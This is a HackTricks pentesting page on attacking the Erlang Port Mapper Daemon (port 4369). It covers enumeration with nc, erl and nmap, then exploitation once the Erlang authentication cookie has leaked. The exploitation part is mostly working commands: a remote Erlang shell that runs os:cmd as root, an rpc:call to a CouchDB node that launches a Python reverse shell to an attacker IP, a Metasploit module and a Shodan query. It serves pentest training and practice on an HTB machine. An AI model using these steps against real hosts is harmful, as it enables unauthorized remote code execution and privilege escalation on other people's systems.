HackTricks
Search…
Pentesting
4369 - Pentesting Erlang Port Mapper Daemon (epmd)

Basic Info

The erlang port mapper daemon is used to coordinate distributed erlang instances. His job is to keep track of which node name listens on which address. Hence, epmd map symbolic node names to machine addresses.
Default port: 4369
1
PORT STATE SERVICE VERSION
2
4369/tcp open epmd Erlang Port Mapper Daemon
Copied!
This is used by default on RabbitMQ and CouchDB installations.

Enumeration

Manual

1
echo -n -e "\x00\x01\x6e" | nc -vn <IP> 4369
2
3
#Via Erlang, Download package from here: https://www.erlang-solutions.com/resources/download.html
4
dpkg -i esl-erlang_23.0-1~ubuntu~xenial_amd64.deb
5
apt-get install erlang
6
erl #Once Erlang is installed this will promp an erlang terminal
7
1> net_adm:names('<HOST>'). #This will return the listen addresses
Copied!

Automatic

1
nmap -sV -Pn -n -T4 -p 4369 --script epmd-info <IP>
2
3
PORT STATE SERVICE VERSION
4
4369/tcp open epmd Erlang Port Mapper Daemon
5
| epmd-info:
6
| epmd_port: 4369
7
| nodes:
8
| bigcouch: 11502
9
| freeswitch: 8031
10
| ecallmgr: 11501
11
| kazoo_apps: 11500
12
|_ kazoo-rabbitmq: 25672
Copied!

Erlang Cookie RCE

Remote Connection

If you can leak the Authentication cookie you will be able to execute code on the host. Usually, this cookie is located in ~/.erlang.cookie and is generated by erlang at the first start. If not modified or set manually it is a random string [A:Z] with a length of 20 characters.
1
[email protected] ~$ erl -cookie YOURLEAKEDCOOKIE -name test2 -remsh [email protected]
2
Erlang/OTP 19 [erts-8.1] [source] [64-bit] [async-threads:10]
3
4
Eshell V8.1 (abort with ^G)
5
6
At last, we can start an erlang shell on the remote system.
7
8
([email protected])1>os:cmd("id").
9
"uid=0(root) gid=0(root) groups=0(root)\n"
Copied!
More information in https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ The author also share a program to brutforce the cookie:
epmd_bf-0.1.tar.bz2
7KB
Binary

Local Connection

In this case we are going to abuse CouchDB to escalate privileges locally:
1
HOME=/ erl -sname anonymous -setcookie YOURLEAKEDCOOKIE
2
([email protected])1> rpc:call('[email protected]', os, cmd, [whoami]).
3
"homer\n"
4
([email protected])4> rpc:call('[email protected]', os, cmd, ["python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.9\", 9005));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"]).
Copied!
Example taken from https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution You can use Canape HTB machine to practice how to exploit this vuln.

Metasploit

1
#Metasploit can also exploit this if you know the cookie
2
msf5> use exploit/multi/misc/erlang_cookie_rce
Copied!

Shodan

  • port:4369 "at port"
Last modified 1yr ago